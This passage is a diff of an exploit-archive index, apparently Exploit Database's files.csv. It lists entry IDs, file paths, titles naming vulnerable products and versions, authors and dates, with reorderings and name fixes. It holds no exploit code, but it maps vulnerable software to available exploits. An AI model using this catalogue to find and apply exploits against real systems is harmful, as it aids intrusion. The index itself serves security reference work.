'SearchKeywords' Parameter SQL Injection Vulnerability",2009-01-15,Pouya_Server,php,webapps,0 32733,platforms/php/webapps/32733.txt,"w3bcms 'admin/index.php' SQL Injection Vulnerability",2009-01-15,Pouya_Server,php,webapps,0 -32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 User Enumeration Weakness and Cross-Site Scripting Vulnerability",2009-01-16,"clment Oudot",cgi,webapps,0 +32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 User Enumeration Weakness and Cross-Site Scripting Vulnerability",2009-01-16,"clément Oudot",cgi,webapps,0 32735,platforms/asp/webapps/32735.txt,"Blog Manager inc_webblogmanager.asp ItemID Parameter SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0 32736,platforms/asp/webapps/32736.txt,"Blog Manager inc_webblogmanager.asp CategoryID Parameter XSS",2009-01-16,Pouya_Server,asp,webapps,0 32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0 @@ -29495,12 +29534,11 @@ id,file,description,date,author,platform,type,port 32760,platforms/php/webapps/32760.txt,"NewsCMSLite Insecure Cookie Authentication Bypass Vulnerability",2009-01-24,FarhadKey,php,webapps,0 32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 Malformed URI Remote Denial Of Service Vulnerability",2009-01-27,Lostmon,windows,dos,0 32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager <= 7.1 Username Enumeration Weakness",2009-01-27,"Marco Mella",multiple,remote,0 -32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 HTML Form Value Denial of Service Vulnerability",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0 32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0 32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek 'cs.html' URI Redirection Vulnerability",2009-01-28,buzzy,php,webapps,0 32767,platforms/php/webapps/32767.txt,"QuickCMS 5.4 - Multiple Vulnerabilites",2014-04-09,"Shpend Kurtishaj",php,webapps,0 -32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gstebuch 1.7b - 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0 +32768,platforms/cgi/webapps/32768.pl,"PerlSoft G",2009-01-29,Perforin,cgi,webapps,0 32769,platforms/php/remote/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,remote,0 32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross-Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0 32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation Vulnerability",2009-02-02,"Ruben Santamarta ",windows,local,0 @@ -29518,6 +29556,8 @@ id,file,description,date,author,platform,type,port 32783,platforms/php/webapps/32783.txt,"FotoWeb 6.0 Grid.fwx search Parameter XSS",2009-02-09,"Stelios Tigkas",php,webapps,0 32784,platforms/php/webapps/32784.txt,"glFusion 1.1 Anonymous Comment 'username' Field HTML Injection Vulnerability",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0 32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 +33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router Admin Password CSRF Vulnerability",2014-04-30,"shyamkumar somana",hardware,webapps,80 +33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 login.php goto Parameter XSS",2009-07-27,Moudi,php,webapps,0 32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",2014-04-10,metasploit,unix,remote,443 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF Vulnerability",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443 @@ -29534,14 +29574,13 @@ id,file,description,date,author,platform,type,port 32802,platforms/php/webapps/32802.txt,"ClipBucket 1.7 - 'dwnld.php' Directory Traversal Vulnerability",2009-02-16,JIKO,php,webapps,0 32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar 'eventid' Parameter SQL Injection Vulnerability",2008-10-01,r45c4l,php,webapps,0 32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0 -32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability",2009-02-20,"Clment Lecigne",linux,local,0 +32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability",2009-02-20,"Clément Lecigne",linux,local,0 32806,platforms/php/webapps/32806.txt,"Blue Utopia 'index.php' Local File Include Vulnerability",2009-02-22,PLATEN,php,webapps,0 32807,platforms/php/webapps/32807.txt,"Joomla! and Mambo gigCalendar Component 1.0 - 'banddetails.php' SQL Injection Vulnerability",2009-02-23,"Salvatore Fresta",php,webapps,0 32808,platforms/php/webapps/32808.txt,"Magento 1.2 app/code/core/Mage/Admin/Model/Session.php login[username] Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32809,platforms/php/webapps/32809.txt,"Magento 1.2 app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32810,platforms/php/webapps/32810.txt,"Magento 1.2 downloader/index.php URL XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution Vulnerability",2009-02-24,"Javier Vicente Vallejo",unix,remote,0 -32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0 32814,platforms/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection Vulnerability",2014-04-11,delme,php,webapps,0 32815,platforms/linux/local/32815.c,"Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness",2009-02-25,"Chris Evans",linux,local,0 32816,platforms/php/webapps/32816.txt,"Orooj CMS 'news.php' SQL Injection Vulnerability",2009-02-25,Cru3l.b0y,php,webapps,0 @@ -29550,10 +29589,12 @@ id,file,description,date,author,platform,type,port 32819,platforms/php/webapps/32819.txt,"Parsi PHP CMS 2.0 - 'index.php' SQL Injection Vulnerability",2009-02-26,Cru3l.b0y,php,webapps,0 32820,platforms/linux/local/32820.txt,"OpenSC 0.11.x PKCS#11 Implementation Unauthorized Access Vulnerability",2009-02-26,"Andreas Jellinghaus",linux,local,0 32821,platforms/java/webapps/32821.html,"APC PowerChute Network Shutdown HTTP Response Splitting and Cross-Site Scripting Vulnerabilities",2009-02-26,"Digital Security Research Group",java,webapps,0 +32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,metasploit,windows,remote,0 32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 Language File Parsing Buffer Overflow Vulnerability",2009-02-27,"musashi karak0rsan",windows,dos,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning Vulnerability",2009-02-27,"Matthew Dempsky",linux,remote,0 32826,platforms/windows/remote/32826.html,"iDefense COMRaider Active X Control 'write()' Arbitrary File Overwrite Vulnerability",2009-03-02,"Amir Zangeneh",windows,remote,0 +32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0 32827,platforms/php/webapps/32827.txt,"Afian 'includer.php' Directory Traversal Vulnerability",2009-03-02,vnbrain.net,php,webapps,0 32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0 32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass Vulnerability",2009-03-02,"Chris Evans",linux,local,0 @@ -29582,6 +29623,8 @@ id,file,description,date,author,platform,type,port 32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 - 'tiki-galleries.php' Cross-Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 - 'tiki-list_file_gallery.php' Cross-Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 - 'tiki-listpages.php' Cross-Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0 +32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 - 'oscid' Session Fixation Vulnerability",2009-04-02,laurent.desaulniers,php,webapps,0 +33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross-Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0 32856,platforms/linux/dos/32856.txt,"MPlayer Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 32857,platforms/linux/dos/32857.txt,"MPlayer Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Parameter Cross-Site Scripting Vulnerability",2009-03-17,syniack,java,webapps,0 @@ -29591,7 +29634,7 @@ id,file,description,date,author,platform,type,port 32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 - 'command.shtml' Cross-Site Scripting Vulnerability",2009-03-31,"SCS team",java,webapps,0 32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting Vulnerability",2009-05-20,"SCS team",java,webapps,0 32864,platforms/java/webapps/32864.txt,"Sun Java System Communications Express 6.3 - 'UWCMain' Cross-Site Scripting Vulnerability",2009-05-20,"SCS team",java,webapps,0 -32865,platforms/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Snchez",multiple,dos,0 +32865,platforms/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos,0 32866,platforms/ios/webapps/32866.txt,"PDF Album 1.7 iOS - File Include Web Vulnerability",2014-04-14,Vulnerability-Lab,ios,webapps,0 32867,platforms/php/webapps/32867.txt,"Wordpress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32868,platforms/php/webapps/32868.txt,"Wordpress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 @@ -29613,7 +29656,6 @@ id,file,description,date,author,platform,type,port 32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0 32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE",2014-04-15,"Brandon Perry",unix,remote,443 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 -32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 - 'oscid' Session Fixation Vulnerability",2009-04-02,laurent.desaulniers,php,webapps,0 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross-Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0 32889,platforms/php/webapps/32889.txt,"4CMS SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0 32890,platforms/unix/remote/32890.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting Vulnerability",2009-04-01,"Richard H. Brain",unix,remote,0 @@ -29621,7 +29663,7 @@ id,file,description,date,author,platform,type,port 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 Login username XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0 -32895,platforms/multiple/webapps/32895.txt,"IBM BladeCenter Advanced Management Module 1.42 private/file_management.ssi PATH Parameter XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0 +32895,platforms/multiple/webapps/32895.txt,"IBM BladeCenter Advanced Management Module 1.42 - private/file_management.ssi PATH Parameter XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0 32896,platforms/multiple/webapps/32896.html,"IBM BladeCenter Advanced Management Module 1.42 - CSRF",2009-04-09,"Henri Lindberg",multiple,webapps,0 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager Cross-Site Scripting And HTML Injection Vulnerabilities",2009-04-09,"Usman Saeed",java,webapps,0 32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",asp,webapps,0 @@ -29629,7 +29671,6 @@ id,file,description,date,author,platform,type,port 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass Vulnerability",2009-04-10,"Maksymilian Arciemowicz",php,local,0 32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 File Download Denial of Service Vulnerability",2009-04-11,"Nam Nguyen",windows,dos,0 32903,platforms/asp/webapps/32903.txt,"People-Trak Login SQL Injection Vulnerability",2009-04-13,Mormoroth.net,asp,webapps,0 -32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,metasploit,windows,remote,0 32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 login.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 new_images.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension 'apps/web/vs_diag.cgi' Cross-Site Scripting Vulnerability",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0 @@ -29640,6 +29681,9 @@ id,file,description,date,author,platform,type,port 32912,platforms/php/webapps/32912.txt,"Phorum 5.2 admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 32913,platforms/php/webapps/32913.txt,"Phorum 5.2 versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 32914,platforms/php/webapps/32914.php,"Geeklog <= 1.5.2 - 'usersettings.php' SQL Injection Vulnerability",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0 +33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0 +32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0 +32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0 32919,platforms/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",hardware,remote,0 32920,platforms/multiple/remote/32920.txt,"Apache Geronimo 2.1.x /console/portal/Server/Monitoring Multiple Parameter XSS",2009-04-16,DSecRG,multiple,remote,0 32921,platforms/multiple/remote/32921.txt,"Apache Geronimo 2.1.x /console/portal/ URI XSS",2009-04-16,DSecRG,multiple,remote,0 @@ -29651,7 +29695,7 @@ id,file,description,date,author,platform,type,port 32927,platforms/java/webapps/32927.txt,"BlackBerry Enterprise Server 4.0/4.1 MDS Connection Service Cross-Site Scripting Vulnerability",2009-04-16,"Ken Millar",java,webapps,0 32928,platforms/php/webapps/32928.txt,"Malleo 1.2.3 - 'admin.php' Local File Include Vulnerability",2009-04-17,Drosophila,php,webapps,0 32929,platforms/linux/remote/32929.txt,"Red Hat Stronghold Web Server 2.3 - Cross-Site Scripting Vulnerability",2009-04-20,"Xia Shing Zee",linux,remote,0 -32930,platforms/php/webapps/32930.txt,"CMSimple 4.4, 4.4.2 - Remote File Inclusion",2014-04-18,NoGe,php,webapps,80 +32930,platforms/php/webapps/32930.txt,"CMSimple 4.4_ 4.4.2 - Remote File Inclusion",2014-04-18,NoGe,php,webapps,80 32931,platforms/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 (Firmware) 'administration.cgi' Access Validation Vulnerability",2009-04-20,"Gabriel Lima",hardware,remote,0 32932,platforms/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Parameter Cross-Site Scripting Vulnerability",2009-04-20,Vrs-hCk,php,webapps,0 32933,platforms/php/webapps/32933.txt,"Online Contact Manager 3.0 index.php showGroup Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0 @@ -29681,6 +29725,7 @@ id,file,description,date,author,platform,type,port 32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal Vulnerability and Arbitrary File Disclosure Vulnerability",2009-04-27,"Alfons Luja",windows,remote,0 32958,platforms/php/webapps/32958.txt,"MataChat 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0 32959,platforms/windows/remote/32959.rb,"Adobe Flash Player Regular Expression Heap Overflow",2014-04-21,metasploit,windows,remote,0 +33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x - 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0 32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML-Injection and Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 - 'nsTextFrame::ClearTextRun()' Remote Memory Corruption Vulnerability",2009-04-27,"Marc Gueury",linux,dos,0 32962,platforms/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 Security Bypass Vulnerability",2009-04-29,J.Greil,cgi,remote,0 @@ -29691,17 +29736,21 @@ id,file,description,date,author,platform,type,port 32967,platforms/multiple/remote/32967.txt,"Openfire 3.x jabber:iq:auth 'passwd_change' Remote Password Change Vulnerability",2009-05-04,"Daryl Herzmann",multiple,remote,0 32968,platforms/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component Multiple SQL Injection Vulnerabilities",2009-05-05,"RedTeam Pentesting",php,webapps,0 32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Function Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 +33077,platforms/linux/dos/33077.c,"MySQL <= 5.0.75 - 'sql_parse.cc' Multiple Format String Vulnerabilities",2009-06-08,kingcope,linux,dos,0 32971,platforms/multiple/remote/32971.txt,"Glassfish Enterprise Server 2.1 Admin Console /applications/applications.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 +33577,platforms/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,multiple,remote,0 +33352,platforms/windows/remote/33352.py,"Easy File Sharing Web Server 6.8 - Stack Buffer Overflow",2014-05-14,superkojiman,windows,remote,80 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0 +32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 Admin Console /sysnet/registration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32974,platforms/multiple/remote/32974.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/configuration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32975,platforms/multiple/remote/32975.txt,"Glassfish Enterprise Server 2.1 Admin Console /customMBeans/customMBeans.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0 32977,platforms/multiple/remote/32977.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/resources.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 -32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 Admin Console /sysnet/registration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0 32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0 -32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 (sorter.php, sorter_value param) - SQL Injection",2014-04-22,chapp,php,webapps,80 +34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0 +32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 (sorter.php sorter_value param) - SQL Injection",2014-04-22,chapp,php,webapps,80 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 Error Page Cross-Site Scripting Vulnerability",2009-05-05,DSecRG,multiple,remote,0 @@ -29714,14 +29763,13 @@ id,file,description,date,author,platform,type,port 32994,platforms/multiple/remote/32994.xml,"Apple Safari <= 3.2.2 - 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",multiple,remote,0 32995,platforms/linux/dos/32995.txt,"Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow Vulnerability",2009-05-27,"Simple Nomad",linux,dos,0 32996,platforms/multiple/remote/32996.txt,"Nortel Contact Center Manager Administration Password Disclosure Vulnerability",2009-05-14,"Bernhard Muller",multiple,remote,0 -32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0 -32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0 32999,platforms/php/webapps/32999.py,"Bonefire 0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Ince",php,webapps,0 +33057,platforms/php/webapps/33057.txt,"Aardvark Topsites PHP 5.2 - 'index.php' Cross-Site Scripting Vulnerability",2009-05-26,anonymous,php,webapps,0 33000,platforms/php/webapps/33000.txt,"Cacti <= 0.8.7 - 'data_input.php' Cross-Site Scripting Vulnerability",2009-05-15,fgeek,php,webapps,0 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site scripting and Remote Command Execution Vulnerability",2009-05-20,inking,php,webapps,0 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 Web Application Firewall Security Bypass Vulnerabilities",2009-05-20,EnableSecurity,php,webapps,0 33003,platforms/php/webapps/33003.txt,"Wordpress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 -33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 (dompdf.php, read param) - Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 +33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 (dompdf.php read param) - Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443 33007,platforms/multiple/remote/33007.txt,"Novell GroupWise <= 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 @@ -29748,7 +29796,7 @@ id,file,description,date,author,platform,type,port 33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0 33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities",2014-04-26,JIKO,php,webapps,0 33031,platforms/linux/dos/33031.html,"Mozilla Firefox 3.0.x Large GIF File Background Denial of Service Vulnerability",2009-05-10,"Ahmad Muammar",linux,dos,0 -33032,platforms/linux/remote/33032.txt,"'Compress::Raw::Zlib' Perl Module - Remote Code Execution Vulnerability",2009-05-11,"Leo Bergolth",linux,remote,0 +33032,platforms/linux/remote/33032.txt,"Compress::Raw::Zlib Perl Module - Remote Code Execution Vulnerability",2009-05-11,"Leo Bergolth",linux,remote,0 33033,platforms/multiple/remote/33033.html,"WebKit JavaScript 'onload()' Event Cross Domain Scripting Vulnerability",2009-05-08,"Michal Zalewski",multiple,remote,0 33034,platforms/linux/remote/33034.txt,"WebKit XML External Entity Information Disclosure Vulnerability",2009-05-08,"Chris Evans",linux,remote,0 33035,platforms/windows/remote/33035.txt,"Microsoft Windows Media Player 11 ScriptCommand Multiple Information Disclosure Vulnerabilities",2009-05-12,"Rosario Valotta",windows,remote,0 @@ -29773,7 +29821,6 @@ id,file,description,date,author,platform,type,port 33054,platforms/hardware/remote/33054.txt,"Cisco Adaptive Security Appliance 8.x Web VPN FTP or CIFS Authentication Form Phishing Vulnerability",2009-05-24,"David Byrne",hardware,remote,0 33055,platforms/hardware/remote/33055.html,"Cisco ASA Appliance 8.x WebVPN DOM Wrapper Cross-Site Scripting Vulnerability",2009-05-24,"Trustwave's SpiderLabs",hardware,remote,0 33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - SEH Overflow PoC",2014-04-27,st3n,windows,dos,0 -33057,platforms/php/webapps/33057.txt,"Aardvark Topsites PHP 5.2 - 'index.php' Cross-Site Scripting Vulnerability",2009-05-26,anonymous,php,webapps,0 33058,platforms/multiple/dos/33058.txt,"Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0 33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 Playlist File Buffer Overflow Vulnerability",2009-05-28,Jambalaya,windows,dos,0 33060,platforms/php/webapps/33060.txt,"phpMyAdmin <= 3.3.0 - 'db' Parameter Cross-Site Scripting Vulnerability",2009-05-30,r0t,php,webapps,0 @@ -29792,7 +29839,6 @@ id,file,description,date,author,platform,type,port 33073,platforms/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123 33075,platforms/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection",2014-04-28,Esac,php,webapps,80 33076,platforms/php/webapps/33076.txt,"Wordpress iMember360 Plugin 3.8.012 - 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80 -33077,platforms/linux/dos/33077.c,"MySQL <= 5.0.75 - 'sql_parse.cc' Multiple Format String Vulnerabilities",2009-06-08,kingcope,linux,dos,0 33078,platforms/multiple/remote/33078.txt,"HP ProCurve Threat Management Services zl ST.1.0.090213 Module CRL Security Bypass Vulnerability",2009-06-13,anonymous,multiple,remote,0 33079,platforms/multiple/remote/33079.txt,"Oracle Weblogic Server 10.3 - 'console-help.portal' Cross-Site Scripting Vulnerability",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33080,platforms/multiple/dos/33080.txt,"Oracle 11.1 Database Network Foundation Heap Memory Corruption Vulnerability",2009-06-14,"Dennis Yurichev",multiple,dos,0 @@ -29807,6 +29853,13 @@ id,file,description,date,author,platform,type,port 33089,platforms/windows/remote/33089.pl,"iDefense COMRaider ActiveX Control Multiple Insecure Method 